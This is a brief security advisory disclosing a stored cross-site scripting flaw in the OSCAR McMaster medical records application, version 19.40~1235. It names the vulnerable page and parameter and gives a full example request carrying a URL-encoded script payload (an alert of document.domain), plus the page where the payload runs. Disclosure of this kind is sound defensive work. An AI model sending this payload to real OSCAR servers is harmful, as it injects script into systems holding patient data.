A stored Cross Site Scripting vulnerability exists in multiple pages in version 19.40~1235 of the OSCAR McMaster application that allows for arbitrary execution of JavaScript commands.
[Placeholder for CVE mitre]
Vulnerable JSP Pages:
providercontrol.jsp - mygroupno parameter
Example Vulnerable Payload:
/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0
Stored response is executed against the user in the following link:
/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth
Discovered by Jack McBride, August 2021